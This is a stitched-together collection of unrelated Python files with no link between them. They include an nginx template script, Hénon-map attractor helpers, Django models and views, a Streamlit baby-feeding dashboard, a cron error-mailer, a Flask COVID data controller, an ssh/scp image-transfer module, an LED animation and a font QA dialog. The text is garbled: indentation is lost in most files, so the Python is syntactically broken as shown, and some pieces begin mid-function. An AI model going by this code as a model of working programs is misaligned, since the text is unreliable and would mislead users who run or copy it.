        with open(templatePath) as filein:
            src = Braced(filein.read())
configPath = os.environ['NGINX_CONFIG_DIRECTORY'] + '/' + os.environ['NGINX_CONFIG_FILENAME']
certbotChallengeDirectory = os.environ['CERTBOT_CHALLENGE_DIRECTORY']
mapping = dict(
userConfigInclude='include {};'.format(configPath) if not noCertsAvailableYet else '',
certbotChallengeDirectory=certbotChallengeDirectory,
certs='/etc/letsencrypt/live'
)
outString = src.substitute(mapping)
        with open(confOutputPath, 'w') as fileout:
            fileout.write(outString)
sys.stdout.flush()
|
import numpy as np
from cmath import sqrt
def check_limit(point, xp, yp, acc=1e-5):
""" Function that checks whether or not a point is within a certain range of an
x and y coordinate. The input parameter 'point' gives the point that has to
be checked. 'xp' and 'yp' give the coordinates to which the point will be
compared to. 'acc' gives the accuracy for how close the point should be to
the x and y coordinates.
Input: point = point that will be compared (tuple);
xp = x coordinate to which the point will be compared (float);
yp = y coordinate to which the point will be compared (float);
acc = accuracy of how close the point should be (float);
Returns: boolean whether or not the point is inside the given range.
"""
    # Checking x coordinate
    if xp - acc <= point[0] <= xp + acc:
        # Checking y coordinate
        if yp - acc <= point[1] <= yp + acc:
            # Point is inside range
            return True
    # Point is outside range
    return False
def determine_point(xv, yv, acc=1e-10):
""" Function that determines whether or not the a set of points converge to a point;
e.g. whether or not an attractor is a point attractor. 'xv' and 'yv' give the
list of x and y coordinates respectively. 'acc' determines how close points have
to be to be considered a point attractor.
Input: xv = list or array of x coordinates of the points (list or numpy array);
yv = list or array of y coordinates of the points (list or numpy array);
acc = accuracy for how close the points should be (float);
Returns: the coordinates of the point for a point attractor, None otherwise.
"""
# Constants
L = len(xv) # Number of points in the lists
step = int(L/11) # Step size that will be used
count = 0 # Number of times the point has been found in the list
# The last point of the list
point = (xv[-1], yv[-1])
for i in range(step, L, step+1):
# Checking if the current point is equal to the last point of the list
if check_limit((xv[i], yv[i]), point[0], point[1], acc=acc):
# Point found
count += 1
# Check to see if it was not just coincidentally
if count > 2:
return point # Point attractor
return None
def determine_period(xvals, yvals, acc=1e-8):
""" Function that determines whether or not x and y values is periodic; if the
values are periodic, the period is returned as well as the values that make
up the period. If no period is detected None is returned. The way this
function determines whether or not a list is periodic, is by looping over a
part of the values. The loop is started at the second to last point, and
moves towards previous points. For each point it is checked whether or not
the x and y values correspond to the last point in the list; if this is the
case we have detected that the list is most likely periodic. This is might
not always be the case as some point might be very close to the end point
while the list is still not periodic. To deal with this it is possible to
adjust the 'acc' parameter which determines how close the point should be to
the end point for it to 'count' as the same point. To increase the speed, a
only the last 10% of the list will be checked for periodicty; therefore this
works best for relatively large lists.
Input: xvals = list containing the x values that will be checked (list);
yvals = list containing the y values that will be checked (list);
acc = accuracy of how close the points should be to count (float);
Returns: period = the detected period (integer);
list containing the x values that make up the period (list);
list containing the y values that make up the period (list);
OR: None
"""
# Checking if the x and y lists have the same length
if len(xvals) != len(yvals):
raise Exception("xvals and yvals must have the same length")
# Finding the length and maximum period of the list
L = len(xvals)
max_period = int(L/10)
# Determining the end point
end_point = (xvals[-1], yvals[-1])
# The current period
period = 1
# Looping over the values in the list, going from last entries to first
for i in range(L-2, L-max_period, -1):
# Checking if the end point occured earlier in the list
if check_limit(end_point, xvals[i], yvals[i], acc=acc):
return period, xvals[i:-1], yvals[i:-1]
# Period increases with 1
period += 1
return None
def solve_eig_vals(xp, av, bv):
""" Function that finds the eigenvalues of the Jacobian matrix of the Hénon map by solving the
characteristic equation. Imaginary solutions are not included and only the real part is used.
Input: xp = the x coordinate at which the eigenvalues have to be found (float);
av = the a parameter of the Hénon map (float);
bv = the b parameter of the Hénon map (float);
Returns: sol1 = the first and largest eigenvalue at the given point (float);
sol2 = the second and smallest eigenvalue at the given point (float).
"""
# Solving the characteristic equation of the Jacobian matrix at the point
mult = av * xp
sqrt_val = sqrt(mult*mult + bv).real
# The solutions
sol1 = -mult + sqrt_val
sol2 = -mult - sqrt_val
return sol1, sol2
def line_height(value, lower_Val, diff):
""" Function that calculates the hight, on a scale from 0 to 1, for a vertical or horizontal
line. The input 'value' gives the absolute hight of where the vertical line should be.
'lower_Val' gives the lower bound of the plot; 'diff' gives the difference in the upper
bound and the lower bound of the plot. The output 'height' returns the height of the
vertical line.
Input: value = absolute hight of the vertical line (float);
lower_Val = the lower bound of the plot (float);
Diff = the difference in upper and lower bound of the plot (float);
Returns: height = the height of the vertical line (float).
"""
    # Checking if value < 0
if value < 0:
height = abs((value + lower_Val) / diff)
# For all other cases
else:
height = abs((value - lower_Val) / diff)
return height
def create_box(box_lim, Xbound, Ybound):
""" Function that creates the relative limits for the horizontal and vertical lines
for a box. These relative limits can be used for matplotlib.pyplot.axvline and
axhline functions; however in reality often the matplotlib.pyplot.vlines and
hlines are easier to use as they make use of the absolute limits. 'box_lim'
gives the limits of the boxes in dictionary form containing an 'x' and 'y'
component. 'Xbound' gives the x boundary of the plot, so it contains the upper
and lower limit. 'Ybound' is the exact same as 'Xbound' but now for the y
boundaries. The output is a dictionary containing the relative heights of the
box limits relative to the plot; the syntax is the same as the input 'box_lim'.
Input: box_lim = the limits of the box (dictionary);
Xbound = x boundaries of the plot (tuple);
Ybound = y boundaries of the plot (tuple);
Returns: all_vals = the limits of the box relative to the plot (dictionary).
"""
# Finding the start and end values of the box
Xstart, Xend = min(box_lim['x']), max(box_lim['x'])
Ystart, Yend = min(box_lim['y']), max(box_lim['y'])
# Calculating the minimum value of the bounds
X_Min = np.min(Xbound)
Y_Min = np.min(Ybound)
# Finding the difference between maximum and minimum bounds
X_Difference = np.max(Xbound) - X_Min
Y_Difference = np.max(Ybound) - Y_Min
# Finding the lowest x and y values for the box
X_Low = line_height(Xstart, X_Min, X_Difference)
Y_Low = line_height(Ystart, Y_Min, Y_Difference)
# Finding the highest x and y values for the box
x_height = line_height(Xend, X_Min, X_Difference)
y_height = line_height(Yend, Y_Min, Y_Difference)
# Combining the found values
all_vals = {'x': (X_Low, x_height), 'y': (Y_Low, y_height)}
return all_vals
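
# ---------------------------------------------------------------------------
# Minimal self-check sketch (added for illustration; not part of the original
# module). It assumes the helpers above behave as documented: a geometrically
# converging orbit should be classified as a point attractor, and an orbit that
# alternates between two values should be detected as having period 2.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    xs = [2.0**-n for n in range(110)]
    print(determine_point(xs, xs))             # expected: a point very close to (0, 0)
    xp = [0.0, 1.0] * 50
    print(determine_period(xp, xp, acc=1e-8))  # expected: (2, [1.0, 0.0], [1.0, 0.0])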
|
import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
from django.utils.translation import gettext as _
# Create your models here.
class Profile(AbstractUser):
birthday = models.DateField(_('Birthday'), default=datetime.date.today)
genderlist = (
(1, 'Man'),
(2, 'Woman'),
)
gender = models.IntegerField(_('Gender'), null=True, blank=True, choices=genderlist, default=1)
profile = models.TextField(_('Profile'), null=True, blank=True)
def __str__(self):
return self.email
|
"""This is a program to evaluate the restaurant grades of NYC establishments across New York City."""
#author: Matthew Dunn
#netID: mtd368
#date: 12/06/2015
import os
import sys
from dataloader import *
from dataanalyzer import *
from visualizer import *
def main():
try:
while True:
try:
print "\nLoading Data for NYC Restaurants..."
data = loadrestaurantData()
listofBoros = data.BORO.unique()
print "\nAnalyzing Grade Scores over time...."
nycrestaurantgrades = retaurantGradeAnalyzer(data, listofBoros)
print "\nPlotting number of restaurants at given grade over time for all of NYC...."
nycrestaurantgrades.restsbygradeovertime()
print "\nPlotting number of restaurants at given grade over time for each Borough...."
nycrestaurantgrades.createsingleborotoplot()
print "\nComputing Grade Scores for each Borough, this could take a while, so grab a cup of coffee...."
restaurant_analyzer(data)
break
except ValueError:
print "\nHouston, we have a problem..."
break
except KeyboardInterrupt:
print "\n Interrupted!"
except EOFError:
print "\n Interrupted!"
if __name__ == '__main__':
main()
|
import numpy as np
def dict_mean(dict_list):
mean_dict = {}
for key in dict_list[0].keys():
value = []
for i in dict_list:
value.append(i[key])
mean_dict[key] = np.mean(value)
return mean_dict
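
# Minimal usage sketch (added for illustration; the dictionaries below are made up):
# dict_mean averages each key across a list of dicts that all share the same keys.
if __name__ == "__main__":
    runs = [{"loss": 0.4, "acc": 0.9}, {"loss": 0.2, "acc": 0.8}]
    print(dict_mean(runs))  # per-key means: loss ~ 0.3, acc ~ 0.85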
|
import pydeck as pdk
import datetime
import bar_chart_race as bcr
import math
import altair as alt
from altair import Chart, X, Y, Axis, SortField, OpacityValue
import plotly.figure_factory as ff
import matplotlib.pyplot as plt
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import pandas as pd
import numpy as np
import time
import streamlit as st
# TODO: add the entire contents of secrets.toml to Streamlit secrets during deployment
scope = ['https://spreadsheets.google.com/feeds','https://www.googleapis.com/auth/drive']
import json
key_dict = json.loads(st.secrets["textkey"])
creds = ServiceAccountCredentials.from_json_keyfile_dict(key_dict, scope)
client = gspread.authorize(creds)
#Change to your Google Sheets Name
#can add more spreadsheets as in example - spreadsheets = ['dummy_10k_response','dummy_data_pcr_test']
spreadsheets = ['Mommys Milk Bar']
def main(spreadsheets):
df = pd.DataFrame()
for spreadsheet in spreadsheets:
# Open the Spreadsheet
sh = client.open(spreadsheet)
# Get all values in the first worksheet
worksheet = sh.get_worksheet(0)
data = worksheet.get_all_values()
# Save the data inside the temporary pandas dataframe
df_temp = pd.DataFrame(columns=[i for i in range(len(data[0]))])
for i in range(1, len(data)):
df_temp.loc[len(df_temp)] = data[i]
#Convert column names
column_names = data[0]
df_temp.columns = [convert_column_names(x) for x in column_names]
# Data Cleaning
#df_temp['Response'] = df_temp['Response'].replace({'': 'Yes'})
# Concat Dataframe
df = pd.concat([df, df_temp])
return df # added this line. Delete when writing to csv. Testing for combined file, trying to return function to df.
# API Limit Handling
time.sleep(5)
#this line below does nothing after the return df was added above. Output file outside of function
#df.to_csv('10k_survey_google_output.csv', index=False)
def convert_column_names(x):
if x == 'Timestamp':
return 'date_time'
elif x == 'Feeding duration (left)':
return 'duration_left'
elif x == 'Diaper Check':
return 'diaper'
elif x == 'Pumping duration (minutes)':
return 'pump_duration'
elif x == 'Supplemental Feeding (nearest ounce)':
return 'supplement_ounces'
elif x == 'Vitamin D':
return 'Vitamin_D'
elif x == "Mommy's Medication [Ibuprofen]":
return 'Ibuprofen'
elif x == "Mommy's Medication [Paracetamol]":
return 'Paracetamol'
elif x == "Mommy's Medication [Fluoxetine]":
return 'Fluoxetine'
elif x == 'Feeding duration (right)':
return 'duration_right'
elif x == "Mommy's Medication [Prenatal vitamin]":
return 'prenatal'
else:
return x
print('scraping form data')
df = main(spreadsheets)
print(df)
data = df
data['date_time'] = pd.to_datetime(data['date_time']) # this creates an odd time stamp in streamlit. Not required.
#OPTION TO WRITE TO CSV
#data.to_csv('sweetpea.csv', index = False)
st.title("Mommy's Milk Bar")
st.image('./Eat_Local.jpg', caption="Eat Local at Mommy's Milk Bar")
st.subheader('Record wiggles here https://docs.google.com/forms/d/e/1FAIpQLSdlKkmgFKdIyj7wT4I2QdPqNUI6DZWliE4vH4EWE59z6kwqPg/viewform?vc=0&c=0&w=1&flr=0')
st.subheader("Mommy's Milk Bar House Rules: No fussin', no cussin', open 24/7")
st.write(data)
st.altair_chart(alt.Chart(data)
.mark_rect()
.encode(
alt.X('hours(date_time):O', title='hour'),
alt.Y('monthdate(date_time):O', title='day'),
color='count(data):Q',
tooltip=[
alt.Tooltip('hours(date_time):O', title='hour'),
alt.Tooltip('count(data):Q', title='action'),
alt.Tooltip('count(diaper):Q', title='diaper')
]
).properties(
title='All the milk bar activities'
))
st.title("Wiggles by hour")
hour_selected = st.slider("Select hour of wiggles", 0, 23)
# FILTERING DATA BY HOUR SELECTED
data = data[data['date_time'].dt.hour == hour_selected]
# FILTERING DATA FOR THE HISTOGRAM
filtered = data[
(data['date_time'].dt.hour >= hour_selected) & (data['date_time'].dt.hour < (hour_selected + 1))
]
hist = np.histogram(filtered['date_time'].dt.minute, bins=60, range=(0, 60))[0]
chart_data = pd.DataFrame({"minute": range(60), "movement": hist})
# LAYING OUT THE HISTOGRAM SECTION
st.write("")
st.write("**Wiggles per minute between %i:00 and %i:00**" % (hour_selected, (hour_selected + 1) % 24))
st.altair_chart(alt.Chart(chart_data)
.mark_area(
interpolate='step-after',
).encode(
x=alt.X("minute:Q", scale=alt.Scale(nice=False)),
y=alt.Y("movement:Q"),
tooltip=['minute', 'movement']
).configure_mark(
opacity=0.5,
color='blue'
), use_container_width=True)
st.line_chart(data)
st.write(data)
|
from django.shortcuts import render, redirect, get_object_or_404
from django.views import generic
from django.views.generic import CreateView, UpdateView, DeleteView, View
from django.core.urlresolvers import reverse_lazy
from django.contrib.auth import authenticate, login
from .models import Post, Profile
from .forms import UserForm
# Create your views here.
'''
def index_profile(request):
all_profiles = Profile.objects.all()
context = {'all_profiles':all_profiles}
return render(request, 'protest/index_profile.html', context)
def detail_profile(request, profile_id):
profile = get_object_or_404(Profile, pk=profile_id)
context = {'profile':profile}
return render(request, 'protest/detail_profile.html', context)
def index_post(request):
all_posts = Post.objects.all()
context = {'all_posts': all_posts}
return render(request, 'protest/index_post.html', context)
def detail_post(request, post_id):
post = get_object_or_404(Post, pk=post_id)
context = {'post': post}
return render(request, 'protest/detail_post.html', context)
'''
class IndexViewPost(generic.ListView):
template_name = 'protest/index_post.html'
context_object_name = 'all_posts'
def get_queryset(self):
return Post.objects.all()
class DetailViewPost(generic.DetailView):
model = Post
template_name = 'protest/detail_post.html'
class IndexViewProfile(generic.ListView):
template_name = 'protest/index_profile.html'
context_object_name = 'all_profiles'
def get_queryset(self):
return Profile.objects.all()
class DetailViewProfile(generic.DetailView):
model = Profile
template_name = 'protest/detail_profile.html'
class PostCreate(CreateView):
model = Post
fields=['profile_id','subject', 'description', 'organizing_committee', 'age_group', 'incident', 'tag', 'concerned_authority','picture']
class PostUpdate(UpdateView):
model = Post
fields=['profile_id','subject', 'description', 'organizing_committee', 'age_group', 'incident', 'tag', 'concerned_authority','picture']
class PostDelete(DeleteView):
model = Post
success_url = reverse_lazy('protest:index_post')
class UserFormView(View):
form_class = UserForm
template_name = 'protest/registration_form.html'
#display a blank form for a new user
def get(self, request):
form = self.form_class(None)
return render(request, self.template_name, {'form':form})
#register and add user to the db
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
user = form.save(commit=False)
# clean and normalized data
username = form.cleaned_data['username']
password = form.cleaned_data['password']
user.set_password(password)
user.save()
#returns User objects if the credentials are correct
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
#request.user for later purpose
#now redirect them to the home page
return redirect('protest:index_post')
return render(request, self.template_name, {'form': form})
|
import math
cache = {}
def get_cached(x1, y1, x2, y2):
    key = (x1, y1, x2, y2)
    result = cache.get(key)
    # Use "is None": a cached count of 0 is falsy and would otherwise be recomputed.
    if result is None:
        result = robot_paths_recursive(x1, y1, x2, y2)
        cache[key] = result
    return result
def robot_paths_recursive(x1, y1, x2, y2):
if x1 > x2:
return 0
if y1 > y2:
return 0
if x1 == (x2 - 1) and y1 == y2:
return 1
if y1 == (y2 - 1) and x1 == x2:
return 1
if x1 == x2 and y1 == y2:
return 1
return get_cached(x1 + 1, y1, x2, y2) + get_cached(x1, y1 + 1, x2, y2)
def robot_paths(x, y):
return robot_paths_recursive(0, 0, x, y)
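# Note (added): each path from (0, 0) to (x, y) is a sequence of x steps in one
# direction and y steps in the other, so the count is the binomial coefficient
# C(x + y, x) = (x + y)! / (x! * y!), which the closed form below computes.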
def robot_paths_fast(x, y):
return math.factorial(x + y) // (math.factorial(x) * math.factorial(y))
assert robot_paths(0, 0) == robot_paths_fast(0, 0) == 1
assert robot_paths(1, 1) == robot_paths_fast(1, 1) == 2
assert robot_paths(2, 2) == robot_paths_fast(2, 2) == 6
assert robot_paths(3, 3) == robot_paths_fast(3, 3) == 20
assert robot_paths(5, 100) == robot_paths_fast(5, 100) == 96560646
|
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#########################################################################################
# #
# send_error_list_email.py: read the current error lists and send out email #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# Last Update: Oct 27, 2021 #
# #
#########################################################################################
import sys
import os
import string
import re
import getpass
import socket
import random
import time
import datetime
import Chandra.Time
#
#--- reading directory list
#
path = '/data/mta/Script/Cron_check/house_keeping/dir_list_py'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append paths to private folders to the python module search path
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
#
#--- import several functions
#
import mta_common_functions as mcf #---- contains other functions commonly used in MTA scripts
#
#--- check whose account, and set a path to temp location
#
user = getpass.getuser()
user = user.strip()
#
#---- find host machine name
#
machine = socket.gethostname()
machine = machine.strip()
#
#--- possible machine names and user name lists
#
cpu_list = ['colossus-v', 'c3po-v', 'r2d2-v', 'boba-v']
usr_list = ['mta']
cpu_usr_list = ['colossus-v_mta', 'r2d2-v_mta', 'boba-v_mta', 'c3po-v_mta',]
#'c3po-v_cus', 'r2d2-v_cus', 'boba-v_cus']
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
email_list = ['mtadude@cfa.harvard.edu',]
#--------------------------------------------------------------------------------------------------
#-- report_error: read errors from <cup_usr_list>_error_list, sort it out, clean, and send out email
#--------------------------------------------------------------------------------------------------
def report_error():
"""
read errors from <cup_usr_list>_error_list, sort it out, clean, and send out email
Input: none but read from <cup_usr_list>_error_list
Output: email sent out
"""
#
#--- find the current time
#
out = time.strftime('%Y:%m:%d', time.gmtime())
[year, mon, day] = re.split(':', out)
#
#--- set cutting date for the report
#
out = time.strftime('%Y:%j:%H:%M:%S', time.gmtime())
cut = Chandra.Time.DateTime(out).secs - 1.5 * 86400.0
#
#--- create suffix for files which will be saved in Past_errors directory
#
smon = mcf.add_leading_zero(mon)
sday = mcf.add_leading_zero(day, dlen=3)
tail = str(year) + smon + sday
for tag in cpu_usr_list:
efile = house_keeping + 'Records/' + tag + '_error_list'
pfile = house_keeping + 'Records/Past_errors/' + tag + '_error_list_' + tail
prev_line = ''
if os.path.isfile(efile):
#
#--- read error messages from the file
#
data = mcf.read_data_file(efile)
#
#--- sort the data so that we can correct messages to each cron job together
#
data.sort()
task_list = []
time_list = []
mssg_list = []
for ent in data:
atemp = re.split(' : ' , ent)
otime = int(float(atemp[1]))
dtime = mcf.convert_date_format(str(otime), ifmt='%Y%m%d%H%M%S', ofmt='%Y:%j:%H:%M:%S')
#
#--- if the error is more than <cut> day old, ignore
#
stime = Chandra.Time.DateTime(dtime).secs
if stime < cut:
continue
if atemp[2].strip() == '':
continue
task_list.append(atemp[0])
time_list.append(dtime)
mssg_list.append(atemp[2])
#
#--- write out cron job name
#
cname = task_list[0]
sline = '\n\n' + cname + '\n____________________\n\n'
            for i in range(len(mssg_list)):
if task_list[i] != cname:
cname = task_list[i]
sline = sline + '\n\n' + cname + '\n____________________\n\n'
#
#--- create each line. if it is exactly same as one line before, skip it
#
line = time_list[i] + ' : ' + mssg_list[i] + '\n'
                if line != prev_line:
                    sline = sline + line
                    prev_line = line
with open(zspace, 'w') as fo:
fo.write(sline)
#
#--- send email out
#
send_mail(tag, email_list)
#
#--- move the error list to Past_errors directory
#
if os.path.isfile(efile): #--- 03/06/19
cmd = 'mv ' + efile + ' ' + pfile
os.system(cmd)
#--------------------------------------------------------------------------------------------------
#-- send_mail: sending email out ---
#--------------------------------------------------------------------------------------------------
def send_mail(tag, email_list):
"""
sending email out
Input: tag --- user and machine name in the form of c3po-v_mat
email_list --- a list of email address
Output: email sent out
"""
if os.path.isfile(zspace):
if os.stat(zspace).st_size > 0:
atemp = re.split('_', tag)
for email_address in email_list:
cmd = 'cat ' + zspace + '| /usr/bin/tr -cd "\11\12\15\40-\176" | mailx -s "Subject: Cron Error : '
cmd = cmd + atemp[1] + ' on ' + atemp[0] + '" ' + email_address
os.system(cmd)
mcf.rm_files(zspace)
#--------------------------------------------------------------------------------------------------
if __name__ == '__main__':
report_error()
|
from flask import Flask
import csv
import json
import pandas as pd
from datetime import date, timedelta
app = Flask(__name__)
class controllerAmurel:
cities = [
{
'name': 'Armazém',
'population': 8674
},
{
'name': 'Imaruí',
'population': 11672
},
{
'name': 'Pescaria Brava',
'population': 10091
},
{
'name': 'São Martinho',
'population': 3180
},
{
'name': 'Braço do Norte',
'population': 33450
},
{
'name': 'Imbituba',
'population': 44853
},
{
'name': 'Rio Fortuna',
'population': 4611
},
{
'name': 'Treze de Maio',
'population': 7081
},
{
'name': 'Capivari de Baixo',
'population': 24871
},
{
'name': 'Jaguaruna',
'population': 20024
},
{
'name': 'Sangão',
'population': 12678
},
{
'name': 'Tubarão',
'population': 105686
},
{
'name': 'Grão-Pará',
'population': 6223
},
{
'name': 'Laguna',
'population': 45814
},
{
'name': 'Santa Rosa de Lima',
'population': 2142
},
{
'name': 'Gravatal',
'population': 11501
},
{
'name': 'Pedras Grandes',
'population': 3976
},
{
'name': 'São Ludgero',
'population': 13410
}
]
data = pd.DataFrame()
path = 'app/file/caso_full.csv'
def __init__(self):
print('init')
def get_data(self):
yesterday = date.today() - timedelta(days=1)
yesterday = yesterday.strftime('%Y-%m-%d')
df = pd.read_csv(self.path, header=0)
for city in self.cities:
newdf = df[(df.city == city['name']) & (df.date == yesterday)]
self.data = pd.concat([self.data, newdf])
# self.data.to_csv('app/file/caso_teste.csv')
return self.data.to_json(orient='records')
# return json.dumps(self.data)
def get_data_daily(self):
df = pd.read_csv(self.path, header=0)
for city in self.cities:
newdf = df[(df.city == city['name'])]
self.data = pd.concat([self.data, newdf])
# self.data.to_csv('app/file/caso_teste.csv')
return self.data.to_json(orient='records')
# return json.dumps(self.data)
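# Illustrative usage sketch (added; the route below is hypothetical and not part
# of the original module):
# @app.route('/amurel')
# def amurel_cases():
#     return controllerAmurel().get_data()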
|
#!/usr/bin/env python
import os
import subprocess
"""
Shifter, Copyright (c) 2015, The Regents of the University of California,
through Lawrence Berkeley National Laboratory (subject to receipt of any
required approvals from the U.S. Dept. of Energy). All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the University of California, Lawrence Berkeley
National Laboratory, U.S. Dept. of Energy nor the names of its
contributors may be used to endorse or promote products derived from this
   software without specific prior written permission.
See LICENSE for full text.
"""
def _shCmd(system, *args):
if len(args) == 0:
return None
return args
def _cpCmd(system, localfile, targetfile):
return ['cp', localfile, targetfile]
def _sshCmd(system, *args):
if len(args) == 0:
return None
ssh = ['ssh']
### TODO think about if the host selection needs to be smarter
### also, is this guaranteed to be an iterable object?
hostname = system['host'][0]
username = system['ssh']['username']
if 'key' in system['ssh']:
ssh.extend(['-i','%s' % system['ssh']['key']])
if 'sshCmdOptions' in system['ssh']:
ssh.extend(system['ssh']['sshCmdOptions'])
ssh.extend(['%s@%s' % (username, hostname)])
ssh.extend(args)
return ssh
def _scpCmd(system, localfile, remotefile):
ssh = ['scp']
### TODO think about if the host selection needs to be smarter
### also, is this guaranteed to be an iterable object?
hostname = system['host'][0]
username = system['ssh']['username']
if 'key' in system['ssh']:
ssh.extend(['-i','%s' % system['ssh']['key']])
if 'scpCmdOptions' in system['ssh']:
ssh.extend(system['ssh']['scpCmdOptions'])
ssh.extend([localfile, '%s@%s:%s' % (username, hostname, remotefile)])
return ssh
def _execAndLog(cmd, logger):
if logger is not None:
logger.info("about to exec: %s" % ' '.join(cmd))
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if proc is None:
if logger is not None:
logger.error("Could not execute '%s'" % ' '.join(cmd))
return
stdout,stderr = proc.communicate()
if logger is not None:
if stdout is not None and len(stdout) > 0:
logger.debug("%s stdout: %s" % (cmd[0], stdout.strip()))
if stderr is not None and len(stderr) > 0:
logger.error("%s stderr: %s" % (cmd[0], stderr.strip()))
return proc.returncode
def copy_file(filename, system, logger=None):
shCmd = None
cpCmd = None
baseRemotePath = None
if system['accesstype'] == 'local':
shCmd = _shCmd
cpCmd = _cpCmd
baseRemotePath = system['local']['imageDir']
elif system['accesstype'] == 'remote':
shCmd = _sshCmd
cpCmd = _scpCmd
baseRemotePath = system['ssh']['imageDir']
else:
raise NotImplementedError('%s is not supported as a transfer type' % system['accesstype'])
(basePath,imageFilename) = os.path.split(filename)
remoteFilename = os.path.join(baseRemotePath, imageFilename)
remoteTempFilename = os.path.join(baseRemotePath, '%s.XXXXXX.partial' % imageFilename)
# pre-create the file with a temporary name
# TODO: Add command to setup the file with the right striping
preCreate = shCmd(system, 'mktemp', remoteTempFilename)
if logger is not None:
logger.info('about to exec: %s' % ' '.join(preCreate))
proc = subprocess.Popen(preCreate, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
remoteTempFilename = None
if proc is not None:
stdout,stderr = proc.communicate()
if proc.returncode == 0:
remoteTempFilename = stdout.strip()
else:
raise OSError('Failed to precreate transfer file, %s (%d)' % (stderr, proc.returncode))
if len(stderr) > 0 and logger is not None:
logger.error("%s stderr: %s" % (preCreate[0], stderr.strip()))
if remoteTempFilename is None or not remoteTempFilename.startswith(baseRemotePath):
raise OSError('Got unexpected response back from tempfile precreation: %s' % stdout)
copyret = None
try:
copy = cpCmd(system, filename, remoteTempFilename)
copyret = _execAndLog(copy, logger)
except:
rmCmd = shCmd(system, 'rm', remoteTempFilename)
_execAndLog(rmCmd, logger)
raise
if copyret == 0:
try:
mvCmd = shCmd(system, 'mv', remoteTempFilename, remoteFilename)
ret = _execAndLog(mvCmd, logger)
return ret == 0
except:
### we might also need to remove remoteFilename in this case
rmCmd = shCmd(system, 'rm', remoteTempFilename)
_execAndLog(rmCmd, logger)
raise
return False
#def remove_local(filename,system):
# (basePath,imageFilename) = os.path.split(filename)
# targetFilename = os.path.join(system['local']['imageDir'], imageFilename)
# os.unlink(targetFilename)
# return True
def remove_file(filename, system, logger=None):
shCmd = None
baseRemotePath = None
if system['accesstype'] == 'local':
shCmd = _shCmd
baseRemotePath = system['local']['imageDir']
elif system['accesstype'] == 'remote':
shCmd = _sshCmd
baseRemotePath = system['ssh']['imageDir']
(basePath,imageFilename) = os.path.split(filename)
remoteFilename = os.path.join(baseRemotePath, imageFilename)
rmCmd = shCmd(system, 'rm','-f', remoteFilename)
_execAndLog(rmCmd, logger)
return True
def transfer(system,imagePath,metadataPath=None,logger=None):
if metadataPath is not None:
copy_file(metadataPath, system, logger)
if copy_file(imagePath,system, logger):
return True
if logger is not None:
logger.error("Transfer of %s failed" % imagePath)
return False
def remove(system,imagePath,metadataPath=None,logger=None):
if metadataPath is not None:
remove_file(metadataPath, system)
if remove_file(imagePath,system):
return True
if logger is not None:
logger.error("Remove of %s failed" % imagePath)
return False
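# Illustrative sketch (added): shape of the `system` mapping that transfer() and
# remove() expect, inferred from the accessors above. Hostnames, usernames and
# paths are made up.
#
# system = {
#     'accesstype': 'remote',
#     'host': ['login1.example.org'],
#     'ssh': {
#         'username': 'shifteradmin',
#         'key': '/etc/shifter/ssh.key',   # optional
#         'imageDir': '/images',
#     },
# }
# transfer(system, '/tmp/image.squashfs', metadataPath='/tmp/image.meta')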
|
# ## PixelPingPong ##
# This animation runs 1 or many pixels from one end of a strip to the other.
#
# ### Usage ###
# PixelPingPong has 3 optional properties
#
# * max_led - int the number of pixels you want used
# * color - (int, int, int) the color you want the pixels to be
# * additional_pixels - int the number of pixels you want to ping pong
#
# In code:
#
# from PixelPingPong import PixelPingPong
# ...
# anim = PixelPingPong(led, max_led=30, color=(0, 0, 255), additional_pixels=5)
#
# Best run in the region of 5-200 FPS
from bibliopixel.animation import *
class PixelPingPong(BaseStripAnim):
def __init__(self, led, max_led=-1, color=(255, 255, 255), additional_pixels=0):
super(PixelPingPong, self).__init__(led, 0, -1)
self._current = 0
self._minLed = 0
self._maxLed = max_led
if self._maxLed < 0 or self._maxLed < self._minLed:
self._maxLed = self._led.lastIndex
self._additionalPixels = additional_pixels
self._positive = True
self._color = color
def step(self, amt=1):
self._led.fill((0, 0, 0), 0, self._maxLed)
self._led.fill(self._color, self._current, self._current + self._additionalPixels)
if self._positive:
self._current += 1
else:
self._current -= 1
if self._current + self._additionalPixels == self._maxLed:
self._positive = False
if self._current == self._minLed:
self._positive = True
|
#MenuTitle: Check Font
'''
Check family for GlyphsApp
~~~~~~~~~~~~~~~~~~~~~~~~~~
Check selected family passes qa.yml spec and common font errors.
Refer to README for further info.
'''
import vanilla
import os
import glob
import sys
import yaml
import re
script_path = glob.glob(r'/Users/*/Library/Application Support/Glyphs/Scripts/mf-glyphs-scripts')[0]
sys.path.append(script_path)
from QA import (
find_duplicate_glyphs,
has_outlines,
uni00a0_width,
font_name,
)
__version__ = 0.1
__author__ = 'Marc Foley'
class GlyphsUI(object):
'''Dialog for enabling/disabling checks'''
def __init__(self, config_file):
self.w = vanilla.FloatingWindow((330, 500), "QA Selected Font", minSize=(300,500), maxSize=(1000,700))
self.leading = 14
self.head_count = 0
self._heading('Meta Data')
# iterate over config file and add each entry
for key in config_file:
self._checkbox(key, '%s' % key)
self._checkbox('check_family_name', "Check font name has ASCII chars only")
# Vertical Metrics
self._heading('Vertical Metrics:')
self._checkbox('metrics_fam_vals', "Instances/Masters have same values")
# Check Glyphs
self._heading('Glyphs:')
self._checkbox('glyph_no_dups', "No duplicate glyphs")
self._checkbox('glyph_nbspace_space', "nbspace and space are same width")
self._checkbox('glyphs_missing_conts_or_comps', "Glyphs missing contours or components")
